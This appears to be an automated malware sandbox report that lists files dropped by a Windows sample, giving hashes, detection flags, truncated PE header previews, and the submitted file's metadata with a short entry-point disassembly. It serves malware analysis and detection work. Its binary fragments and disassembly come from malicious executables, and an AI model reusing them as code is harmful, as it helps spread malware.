                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......('n.lF..lF..lF..r...OF..r....F..r...BF..K.{.kF..lF...F..r...mF..r...mF..r...mF..RichlF..........PE..L.....Xb.....................>.......v............@.................................m8.........................................P.... ..........................(... ................................T..@............................................text............................... ..`.data....r.......L..................@....rsrc........ ......................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
                                                                                                                Category:dropped
                                                                                                                Size (bytes):49152
                                                                                                                Entropy (8bit):0.7876734657715041
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                                                                                                MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                                                                                                SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                                                                                                SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                                                                                                SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                                                                                                Malicious:false
                                                                                                                Preview:SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 10, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 10
                                                                                                                Category:dropped
                                                                                                                Size (bytes):28672
                                                                                                                Entropy (8bit):0.4393511334109407
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:TLqlj1czkwubXYFpFNYcw+6UwcYzHrSl:TyxcYwuLopFgU1YzLSl
                                                                                                                MD5:8C31C5487A97BBE73711C5E20600C1F6
                                                                                                                SHA1:D4D6B04226D8FFC894749B3963E7DB7068D6D773
                                                                                                                SHA-256:A1326E74262F4B37628F2E712EC077F499B113181A1E937E752D046E43F1689A
                                                                                                                SHA-512:394391350524B994504F4E748CCD5C3FA8EF980AED850A5A60F09250E8261AC8E300657CBB1DBF305729637BC0E1F043E57799E2A35C82EEA3825CE5C9E7051D
                                                                                                                Malicious:false
                                                                                                                Preview:SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):6174208
                                                                                                                Entropy (8bit):6.784474322354299
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:49152:CC10bhksFe6iRyhJ3jkqQVSfWVXqASv1x1dKO/5t7WGiocfGJDcjQcy20RHrzKga:CC10bhqSjL+EnHOMz5ysZA5+bf6c
                                                                                                                MD5:DCB68CBD2858A21413D9EEF6CEB74743
                                                                                                                SHA1:8CD4542CF10673474DC84F2BCE2B5340C62912D1
                                                                                                                SHA-256:0A24308E2589282219361B9A45907CA5AFA3E636692B7404B4933B2605BBE17F
                                                                                                                SHA-512:5F2FD57A38B75C4BF89299BCE01536CA86BF0D936FBEB1678857512742FC06A920A31163EDFE9428AB0EC90846B98C194E87939C0C8BE74E0F6340D299511ABD
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*......................T.....t.............@...........................^..................@...............................$........S.................. ......................................................................................CODE............................... ..`DATA................................@...BSS......................................idata...$.......&..................@....tls....@................................rdata..............................@..P.reloc....... ......................@..P.rsrc.....S.......S.................@..P..............^......6^.............@..P........................................................................................................................................
                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                Category:modified
                                                                                                                Size (bytes):783360
                                                                                                                Entropy (8bit):6.94590615983952
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12288:EyPxw9ZCZboVlRGRbbYWlvVEiFYT9O6/IHjcpiEwluDhcm0cK2tbRl89ys:EyPxmZCZboEEiuTY6/IHj4wfGt2
                                                                                                                MD5:9AF942CF03275F61B93DA646449BC6FE
                                                                                                                SHA1:557F937BF55544E758CD36487C94CF2F4493CB84
                                                                                                                SHA-256:875ECCAA590C18B89561163845B65876B09D5206204696C6A3D6ED1821881006
                                                                                                                SHA-512:DAFB9865F4A1CC61EDEA6E8B110450C0638857D7EC02DFE5560C0F89599738F95023A39753544E7BB44CF27A74AD3826280E19AF79507F7AACE5F033076D68C5
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................V.......................................Rich..........................PE..L.....Gc............... .....................0....@..........................0............@..................................u..(...............................,G..(...T...........................h...@............0..d............................text............................... ..`.rdata...M...0...N..................@..@.data....X.......B...j..............@....reloc..,G.......H..................@..B................................................................................................................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):718848
                                                                                                                Entropy (8bit):6.93268056369065
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12288:CyPxwehxFznlQSRbbYWlvVEi9MT9Xoeh2nlYly8NKughn4k33bOk03vpLcp+cmys:CyPx1hxFzn5EiyT5oeh2nqNSEmp+d
                                                                                                                MD5:8164181F88E99299C79630DCC323DC0B
                                                                                                                SHA1:B5A772BCF28443B581EEC3A44B3AE2DD10977FBD
                                                                                                                SHA-256:D36E565D9C9097FC6D2DF5C8C4CE65E94F05B4A91EAE6841D00ED0589425D087
                                                                                                                SHA-512:163A2B29F7B0A907092A6AE671239E7752DC98483145A2F93D573DB3B35459A97DB456D730769624FDC500CCD70E8A76158B699A2E556D009CD41C9A8D449CC6
                                                                                                                Malicious:true
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................V.......................................Rich..........................PE..L.....Gc............... .....................0....@..........................0............@..................................u..(...............................0G..(...T...........................h...@............0..d............................text............................... ..`.rdata...M...0...N..................@..@.data....\.......F...j..............@....reloc..0G.......H..................@..B................................................................................................................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                                                                                                Category:dropped
                                                                                                                Size (bytes):94208
                                                                                                                Entropy (8bit):1.287139506398081
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:Qo1/8dpUXbSzTPJPF6n/YVuzdqfEwn7PrH944:QS/indc/YVuzdqfEwn7b944
                                                                                                                MD5:292F98D765C8712910776C89ADDE2311
                                                                                                                SHA1:E9F4CCB4577B3E6857C6116C9CBA0F3EC63878C5
                                                                                                                SHA-256:9C63F8321526F04D4CD0CFE11EA32576D1502272FE8333536B9DEE2C3B49825E
                                                                                                                SHA-512:205764B34543D8B53118B3AEA88C550B2273E6EBC880AAD5A106F8DB11D520EB8FD6EFD3DB3B87A4500D287187832FCF18F60556072DD7F5CC947BB7A4E3C3C1
                                                                                                                Malicious:false
                                                                                                                Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):350720
                                                                                                                Entropy (8bit):7.066013369888373
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6144:gSj0lCnSEzmH6NM7xNiSKcTCE0ISaBLeigavwVf:gflREznNM7HBTT0rwT
                                                                                                                MD5:83F6E420D0E55DE0EF78910C864A8714
                                                                                                                SHA1:020F77D3C008F1485252CBA174108DADC4756B24
                                                                                                                SHA-256:AD1195A0D6BA108B68F30C3CECE596EDBEE351A36407A9B4FBD0B1F6CC61726B
                                                                                                                SHA-512:43C18BBD04B0B1B40730ABA03A1B6EC5EAB83162D273C4CE7BDE7919733406C22F528762F7D4F9C1B3928AF6A4EBB01F70141C687A09FBB659EFB031D7EB0485
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......('n.lF..lF..lF..r...OF..r....F..r...BF..K.{.kF..lF...F..r...mF..r...mF..r...mF..RichlF..................PE..L......`............................ v............@.................................%.......................................<...P.................................. ...............................(T..@............................................text.............................. ..`.data...8...........................@....rsrc..............................@..@.reloc..<........ ...:..............@..B........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):3639808
                                                                                                                Entropy (8bit):7.797220477180319
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:98304:wpNo2IecaP2hSdky9lqZ8GaNFvf4cISKJ3UIDslW+5zs4L:R2uT8hbqeTISKJ34/
                                                                                                                MD5:D4381F0A771033752684747EB4D55FC7
                                                                                                                SHA1:5A87BE21DE6AA7275EC3B076DFCD72469B129DD7
                                                                                                                SHA-256:A8756585EF0E2E4E7479606E49A56E52C871C24B65C356B6B38F29CBAE300ECC
                                                                                                                SHA-512:9869D894BD243B5E8D957190920C6764A5FA837D34BB5C7A1AE6E8B6BD8A194E056DA9E9D38D516EDFF17B4A3B9707F77F2A0766CF8F00DE50B142ABAE35BF10
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....>Ec..........#..................I........@..............................`........... ..................................................n,.............0\`.,...........................................X`G.0....[`.0............pF..............................text...\........................... ..`.rdata...... ......................@..@.data..............................@....pdata..$....`......................@..@_RDATA..............................@..@.vmp0...(_..........................`..`.vmp1...\.7..`)...7.................`..h........................................................................................................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1891328
                                                                                                                Entropy (8bit):7.316367150393058
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24576:UQTh2cyxDz583hZprjumLzu2O7K8HzxemmF2ZvgsnJQ9q12BL7TLhn5c0ANTyKmz:O5R831o2cHtemmFoDQ9q12BLTh+0u+b
                                                                                                                MD5:F63F6304ABE92069C701F086040C8BA8
                                                                                                                SHA1:3E26C4BE31BC1D10E754E8BB2175B55CD99CD8C7
                                                                                                                SHA-256:95EB62AEC4B15DD5D3613510087763D9A666742553914BB58C8A4C4FEC81FECD
                                                                                                                SHA-512:B4056DEF76A72CCD610F0DF684E985ED5347FA0748C1281C346B95598AD946295B85A7EB1B2FD8AD41766A4302697F91C929049E26D78E6A96B5A661F411DE0C
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....B*.....................*....................@.......................... .......................................................`....................... ..t=..................................................................................CODE.... ........................... ..`DATA..... ......."..................@...BSS......................................idata..............................@....reloc..t=... ...>..................@..P.rsrc........`.......$..............@..P................................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):840192
                                                                                                                Entropy (8bit):7.734197747435525
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24576:a3mZXlFkI3g1XyU4Q/0OKKVV/3EBcjAT:a3ml/kI70jvEBU
                                                                                                                MD5:3FD2BBEEEF907E2943FF4E2F6FB24E9A
                                                                                                                SHA1:E403F202F605FDF9F928C135E55D32EE8757A4FB
                                                                                                                SHA-256:F1C33F28E91670EA07C5D3D0E0F4B974D98D2A80A193B8B5D5D4883188EE3470
                                                                                                                SHA-512:3CDA6ADC672EA4E02303FDD357A3EEA203F19135B0B88BA9AE7650C47819D0376F98C5AC4FEA7E1083EC42C00B3EB449B843FBA31146E15E5D5E69561F24B4DF
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......('n.lF..lF..lF..r...OF..r....F..r...BF..K.{.kF..lF...F..r...mF..r...mF..r...mF..RichlF..........PE..L...c..a.....................r.......v............@..........................0..................................................P....0..H....................... ...0...............................pT..@............................................text............................... ..`.data............b..................@....rsrc...H....0......................@..@.reloc...".......$..................@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):215552
                                                                                                                Entropy (8bit):6.964023540034276
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3072:KfltFljZM+LbrAeL+25wqALK563G7GFuqp3iRYw0W6dczay2kR3E9O:KNxZjL+25KhdtNiRYXGU9
                                                                                                                MD5:248CBD4B28F796FDBE02725BDB75751A
                                                                                                                SHA1:81FF71EC47E9DDA37AC28DD9FA6072200FB5A05E
                                                                                                                SHA-256:9512F0BA86378BB8DDAFBE3B7C3854AE98637EF9C5BEEFB38F880C220A2C2847
                                                                                                                SHA-512:473F36B247A1D31EC48AFF198EA93272737ABFAC42FCB4A159F59D1C0028B9964F3290550D32511AA9062EC1B1037672EFC17B9DE9E77E14DE212D9C7DE4A31B
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............a...a...a......a.....a..;....a...`.A.a......a......a......a.Rich..a.........................PE..L....X.`.....................Z....................@.......................... ..................................................P.......8L...........................................................9..@...............8............................text............................... ..`.data............"..................@....rsrc...8L.......N..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):248887
                                                                                                                Entropy (8bit):7.999246613628672
                                                                                                                Encrypted:true
                                                                                                                SSDEEP:6144:fv7WB+S12JGrFphCfbrQqz4CAucFLh0YSy1QM:fv6EPJGrFbWYqz4Jucv1Sy1QM
                                                                                                                MD5:8383C0CCEAF3031992F1E31BC6CD98FA
                                                                                                                SHA1:4EF979868229D565EE823F023F3596F6CA70E968
                                                                                                                SHA-256:DCC334841894231CCF1DF104089653AFBC66A522732A5E22D1926CFC4D59308A
                                                                                                                SHA-512:BE75A6D966C1D8E50F4012D15DD0CC87D8EFCD50E0404F3BC44D20D239EF1B8A1E2B5F21ABCA18483A8A2375AB357934419F134BA28875CD533E509CCA606486
                                                                                                                Malicious:false
                                                                                                                Preview:'..I..Z.a.]8....%@.P.=...m.G..V..E.l..0.Y..s.%.......q.6`Ix7z.A.=.b@..I.a....,.^.2.......W.5.U.R?....j........s..o..8t..H..........pH$..c_|.w<W:.N{...]...m.b....n..ap3..;O....I.......tZ.'(K-].3..p.kjqK4.......8...N....J.e...@..O..c<...2........},.,.!Vb]NI...8.^.B.i..4.a2..X...._S.{3......3#.^u#M...%.s=....Qe..Q...... M3I...vB..........q.j.J.....R....H9%I.$8.v...v....b.K.*..8..+.......5....S..rL...ZD.W..I.1hUb]z..3..G.^...).L<...P......*.;..=..a...Z..9J.7}-..t.1hu..K..-..1...C...F.P..b.Z...;......G.C..&J`5;.....B...{..../..r.{.`..mT......0....^...P...."M...^..^=" }!w]V.A./{....lV..8.*..L..d.....B.....*.v$....VV.eH ..X.[1.$..~$..V.v....VI8q.@Zl4,. !."].^..j./.`.......x...l...Z...........C..m&?y.<..N.%.......Z.<...._..y.h....q?.2cmyJ...!.F...J.xXJ]..3.x..@.*D....._.......J...MV....-`...C.M.G........NP..{...V.{..b.....u".N<....[@.\.~..C...`.....F ..O..C...)...{=.<I....U....x...^..=.._P.M.......Y.J=[..Y.9..P...^..w....9.f."....x...?.H.pP1...
                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):216064
                                                                                                                Entropy (8bit):6.956367409137466
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3072:jvKF+fZMRIAKpvLerZeq0IK5iftIh/0Ko25N+o2wu0bRLvvfxPPCfarO:jL5hLerZUUK1GUC4L3pPPoar
                                                                                                                MD5:9E93319D00389F1C55611665E404EA9B
                                                                                                                SHA1:23AA8AED6A57519E0C4107FC6F6A7F16EFE20741
                                                                                                                SHA-256:4E189BA8EAAECC5142CC89FE40D696D216291E906F66B261AF8BB0EDA2BDCF60
                                                                                                                SHA-512:25853C18B768DB54105670DD6D2BD7F233ED1A5711EA76EFE67FD50E47FBA4FB4CCF408700D9FC756D80A53874B9F6FC06C937646DD367A2E9241245B57F1FDE
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............a...a...a......a.....a..;....a...`.A.a......a......a......a.Rich..a.........................PE..L.....la.....................Z....................@.......................... .......C..........................................P.......8L...........................................................9..@...............8............................text............................... ..`.data............$..................@....rsrc...8L.......N..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):26
                                                                                                                Entropy (8bit):3.95006375643621
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                Malicious:true
                                                                                                                Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):160970
                                                                                                                Entropy (8bit):7.998878165150453
                                                                                                                Encrypted:true
                                                                                                                SSDEEP:3072:RdHsTVsYlMMYl7SvMB1zI5D2ZQjhgiw7zpg96YWqQWncvA4eUq10UAJh89LL:RpYRYlq55PjhK7zZzacnebH2+p
                                                                                                                MD5:45383A274CBDCB3629CBF88DBA1791D9
                                                                                                                SHA1:D0AFA32D661DCD59947BD6DF5C7C2DA6AF2E0C6F
                                                                                                                SHA-256:DA426843C8B608CDDC3C94383D6699295DF4C74BFBD9CB0B88C5A0FF1F2A2565
                                                                                                                SHA-512:2062483227AE7719BFCDD277330908D14F3EB8F8AF8E0830F4A238A9F95A73A5227F92AFCEA39336E4247212D9A80922900720A45665E2BB1F59BF8E46D5D651
                                                                                                                Malicious:false
                                                                                                                Preview:.ns..2a.......d$8.6.u....U)@..j.....9/(.....2.S.U.x ...G.?.@.2.A.....2..A.*.b..J...<..T...!p.r...6..,u4.CPp.|....gT..E....f&.Rl............Pa.x.6.e..7.E..v.....}2.X.tCng.o....)*|....V..P..L.....~.....B=...&..*..Q,...<K.a..7....L.4.sUC6.....}..Z........r..........~..j..D.B.F......I;.5.{..C....3.@o...s@..5..e"..)<HX....~...Z.j..4m...d.2.z.@......j%...,.x.!..H7..\?.|...|..Vw .y.9v.L.e..qI.U.y^9.B.&HWI. ..1./....3s....k.P."...I....#.hq!s....9..0.e^,....w.8.s<2..y..z.9.p....;z.....>F.*...<N..JV~.hOeF.o.....;.c...p.:4....2@....E....8.h...b....b...:.........p...P..B..v.<9*.... ....C.az..{.F..GB..Cw.If...^..;...h..O...........v....]......[..tz$....j...>.1|b4&k]`21..{.b..!.Z.......P.......(Kv|%C}.........[.cP&F..M.....5...O.G|@s.._..!..}b|#..,nw..S.7..QC.&......O...-ajp.8.?.....8J&)..c....(xn.[.5.^B_!'...... L...NO'_...^...._or&......v..w]c.C.&....[....n....G.nA.......^...j.^....t..}....g....U....c.4....t".6.v...$xV.\|..$[....Is....Qe...
                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):215552
                                                                                                                Entropy (8bit):6.964023540034276
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3072:KfltFljZM+LbrAeL+25wqALK563G7GFuqp3iRYw0W6dczay2kR3E9O:KNxZjL+25KhdtNiRYXGU9
                                                                                                                MD5:248CBD4B28F796FDBE02725BDB75751A
                                                                                                                SHA1:81FF71EC47E9DDA37AC28DD9FA6072200FB5A05E
                                                                                                                SHA-256:9512F0BA86378BB8DDAFBE3B7C3854AE98637EF9C5BEEFB38F880C220A2C2847
                                                                                                                SHA-512:473F36B247A1D31EC48AFF198EA93272737ABFAC42FCB4A159F59D1C0028B9964F3290550D32511AA9062EC1B1037672EFC17B9DE9E77E14DE212D9C7DE4A31B
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............a...a...a......a.....a..;....a...`.A.a......a......a......a.Rich..a.........................PE..L....X.`.....................Z....................@.......................... ..................................................P.......8L...........................................................9..@...............8............................text............................... ..`.data............"..................@....rsrc...8L.......N..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                Entropy (8bit):6.956367409137466
                                                                                                                TrID:
                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                File name:file.exe
                                                                                                                File size:216064
                                                                                                                MD5:9e93319d00389f1c55611665e404ea9b
                                                                                                                SHA1:23aa8aed6a57519e0c4107fc6f6a7f16efe20741
                                                                                                                SHA256:4e189ba8eaaecc5142cc89fe40d696d216291e906f66b261af8bb0eda2bdcf60
                                                                                                                SHA512:25853c18b768db54105670dd6d2bd7f233ed1a5711ea76efe67fd50e47fba4fb4ccf408700d9fc756d80a53874b9f6fc06c937646dd367a2e9241245b57f1fde
                                                                                                                SSDEEP:3072:jvKF+fZMRIAKpvLerZeq0IK5iftIh/0Ko25N+o2wu0bRLvvfxPPCfarO:jL5hLerZUUK1GUC4L3pPPoar
                                                                                                                TLSH:E424CF2231D0C072D3A75678AC64DAA46FBBFCB00A35868B3BD8476D5F353D29E25346
                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............a...a...a.......a.......a..;....a...`.A.a.......a.......a.......a.Rich..a.........................PE..L.....la...........
                                                                                                                Icon Hash:aecaae9ecea62aa2
                                                                                                                Entrypoint:0x40a0f6
                                                                                                                Entrypoint Section:.text
                                                                                                                Digitally signed:false
                                                                                                                Imagebase:0x400000
                                                                                                                Subsystem:windows gui
                                                                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                Time Stamp:0x616CDABB [Mon Oct 18 02:23:55 2021 UTC]
                                                                                                                TLS Callbacks:
                                                                                                                CLR (.Net) Version:
                                                                                                                OS Version Major:5
                                                                                                                OS Version Minor:0
                                                                                                                File Version Major:5
                                                                                                                File Version Minor:0
                                                                                                                Subsystem Version Major:5
                                                                                                                Subsystem Version Minor:0
                                                                                                                Import Hash:7863b1a1f848089f4072e2bddead2fba
                                                                                                                Instruction
                                                                                                                call 00007F3560BD4A67h
                                                                                                                jmp 00007F3560BCDF9Eh
                                                                                                                mov edi, edi
                                                                                                                push ebp
                                                                                                                mov ebp, esp
                                                                                                                mov eax, dword ptr [ebp+08h]
                                                                                                                test eax, eax
                                                                                                                je 00007F3560BCE134h
                                                                                                                sub eax, 08h
                                                                                                                cmp dword ptr [eax], 0000DDDDh
                                                                                                                jne 00007F3560BCE129h
                                                                                                                push eax
                                                                                                                call 00007F3560BCD932h
                                                                                                                pop ecx
                                                                                                                pop ebp
                                                                                                                ret
                                                                                                                mov edi, edi
                                                                                                                push ebp
                                                                                                                mov ebp, esp
                                                                                                                mov eax, dword ptr [ebp+08h]
                                                                                                                push esi
                                                                                                                mov esi, ecx
                                                                                                                mov byte ptr [esi+0Ch], 00000000h
                                                                                                                test eax, eax
                                                                                                                jne 00007F3560BCE185h
                                                                                                                call 00007F3560BD1939h
                                                                                                                mov dword ptr [esi+08h], eax
                                                                                                                mov ecx, dword ptr [eax+6Ch]
                                                                                                                mov dword ptr [esi], ecx
                                                                                                                mov ecx, dword ptr [eax+68h]
                                                                                                                mov dword ptr [esi+04h], ecx
                                                                                                                mov ecx, dword ptr [esi]
                                                                                                                cmp ecx, dword ptr [004304A0h]
                                                                                                                je 00007F3560BCE134h
                                                                                                                mov ecx, dword ptr [004303B8h]
                                                                                                                test dword ptr [eax+70h], ecx
                                                                                                                jne 00007F3560BCE129h
                                                                                                                call 00007F3560BCF4F1h
                                                                                                                mov dword ptr [esi], eax
                                                                                                                mov eax, dword ptr [esi+04h]
                                                                                                                cmp eax, dword ptr [00430A18h]
                                                                                                                je 00007F3560BCE138h
                                                                                                                mov eax, dword ptr [esi+08h]
                                                                                                                mov ecx, dword ptr [004303B8h]
                                                                                                                test dword ptr [eax+70h], ecx
                                                                                                                jne 00007F3560BCE12Ah
                                                                                                                call 00007F3560BD4C9Eh
                                                                                                                mov dword ptr [esi+04h], eax
                                                                                                                mov eax, dword ptr [esi+08h]
                                                                                                                test byte ptr [eax+70h], 00000002h
                                                                                                                jne 00007F3560BCE136h
                                                                                                                or dword ptr [eax+70h], 02h
                                                                                                                mov byte ptr [esi+0Ch], 00000001h
                                                                                                                jmp 00007F3560BCE12Ch
                                                                                                                mov ecx, dword ptr [eax]
                                                                                                                mov dword ptr [esi], ecx
                                                                                                                mov eax, dword ptr [eax+04h]
                                                                                                                mov dword ptr [esi+04h], eax
                                                                                                                mov eax, esi
                                                                                                                pop esi
                                                                                                                pop ebp
                                                                                                                retn 0004h
                                                                                                                mov edi, edi
                                                                                                                push ebp
                                                                                                                mov ebp, esp
                                                                                                                sub esp, 14h
                                                                                                                mov eax, dword ptr [00430268h]
                                                                                                                xor eax, ebp
                                                                                                                mov dword ptr [ebp-04h], eax
                                                                                                                push ebx
                                                                                                                push esi
                                                                                                                xor ebx, ebx
                                                                                                                Programming Language:
                                                                                                                • [ASM] VS2008 build 21022
                                                                                                                • [ C ] VS2008 build 21022
                                                                                                                • [IMP] VS2005 build 50727
                                                                                                                • [C++] VS2008 build 21022
                                                                                                                • [RES] VS2008 build 21022
                                                                                                                • [LNK] VS2008 build 21022
                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x1d7fc0x50.text
                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x18d0000x4c38.rsrc
                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x12a00x1c.text
                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x39a00x40.text
                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x10000x238.text
                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
